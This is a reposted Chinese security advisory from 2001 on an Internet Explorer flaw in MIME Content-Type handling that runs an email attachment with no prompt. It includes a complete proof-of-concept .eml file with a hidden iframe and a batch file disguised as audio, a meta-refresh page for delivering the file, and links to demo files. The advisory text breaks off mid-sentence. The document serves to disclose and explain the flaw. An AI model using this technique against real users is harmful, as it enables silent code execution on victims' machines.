微软IE异常处理MIME头漏洞

发布日期：2001-04-09
更新日期：2001-04-09

受影响系统：

Microsoft Internet Explorer 5.5
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
Microsoft Internet Explorer 5.01
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows 2000
Microsoft Internet Explorer 5.0
Microsoft Windows 98

不受影响系统：

Microsoft Internet Explorer 5.0.1SP2
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows 2000

描述：

---

根据最新BugTraq报告，微软的IE浏览器被再次发现存在重大安全缺陷。简单来说，
IE在处理MIME头中"Content-Type:"处指定的某些类型时，存在问题，攻击者可以利
用这类缺陷在IE客户端执行任意命令。

报告出来的问题有两个。第一个问题参看如下例子，把下列内容存为"test.eml"。

<------------------cut here--------------------->

From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 0100
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--1
Content-Type: multipart/alternative;
boundary="2"


--2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
HELLO MY FRIEND!!!<BR>
</BODY>
</HTML>

--2--

--1
Content-Type: audio/x-wav;
name="hello.bat"
Content-Transfer-Encoding: quoted-printable
Content-ID: <THE-CID>

echo OFF
dir *.*

--1

<------------------cut here--------------------->

注意最后一个"Content-Type: audio/x-wav;"。

如果在资源管理器中双击打开这个文件，由于很多情况下"eml"扩展名和微软的
Outlook/Outlook Express关联，将调用它们解释"test.eml"。由于这封邮件是HTML
格式的，Outlook/Outlook Express最终调用IE来解释它。IE根据邮件内容中MIME设
置，解析出附件。一般情况下，即使有附件也不会自动下载。如果做了某些设置使得
某些类型的附件会自动下载，也将提示有附件需要下载，用户选择直接打开还是保存。

但是IE在解释上述邮件的时候，由于未能正确处理"Content-Type: audio/x-wav;"，
导致附件"hello.bat"自动下载，而且更为严重的是下载结束后自动打开"hello.bat"，
整个过程中并不提示用户。上述例子中就是最终执行了"dir *.*"。如果从WEB页面上
访问这个eml文件，比如http://<target>/test.eml，同样自动下载并无提示执行
"hello.bat"。

注意，上述问题和eml扩展名是否和Outlook/Outlook Express关联无关。假设eml扩
展名和NotePad相关联，在资源管理器中双击"test.eml"将调出记事本，无法有效激
发漏洞，此时可以用IE指定以WEB方式打开"test.eml"，同样存在该问题。彻底删除
eml扩展名的所有关联对解决漏洞并无帮助。问题最终发生在IE以HTML格式解释eml文
件的时候。

值得提醒大家的是，如果选择采用WEB方式使用资源管理器，而所浏览的目录里存在
攻击性eml文件的话，攻击仍然成立，进入该目录的时候，即使没有选择打开eml文件，
IE同样立即解释eml文件，攻击开始。建议在问题真正解决之前采用传统方式使用资
源管理器。

目前测试结果表明，IE在解释扩展名为eml、nws的文件时，都存在上述问题，把
"test.eml"更名为"test.nws"，前述现象一致。尚未发现IE在解释其他扩展名的文件
时有何缺陷，如果演示用eml文件的扩展名被修改成非eml、非nws，即使强行指定IE
打开该文件，也不会触发漏洞。

正常情况下无法发送上述邮件或者新闻，可以自己编程发送或者利用某些现成工具发
送。也可以将这样的eml、nws文件放置在WEB主机上，利用各种URL转向技术，使远程
用户的IE浏览器最终访问攻击性eml、nws文件，从而达到攻击目的，比如这样一个
index.html文件：

<------------------cut here--------------------->

<HTML>
<meta http-equiv="refresh" content="0;url=http://<target>/attack.eml">
</HTML>

<------------------cut here--------------------->

本漏洞的最初报告人在http://www.kriptopolis.com/cua/eml.html上提供了如下三
个演示eml：

http://www.terra.es/personal/cuartango/cmd.eml
http://www.terra.es/personal/cuartango/vbs.eml
http://www.terra.es/personal/cuartango/exe.eml?

分别演示了直接执行BAT文件、执行VB SCRIPT、执行EXE文件的三种情况。

第一个问题的危害是明显的，攻击者潜在可以造成任意破坏。下述命令

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有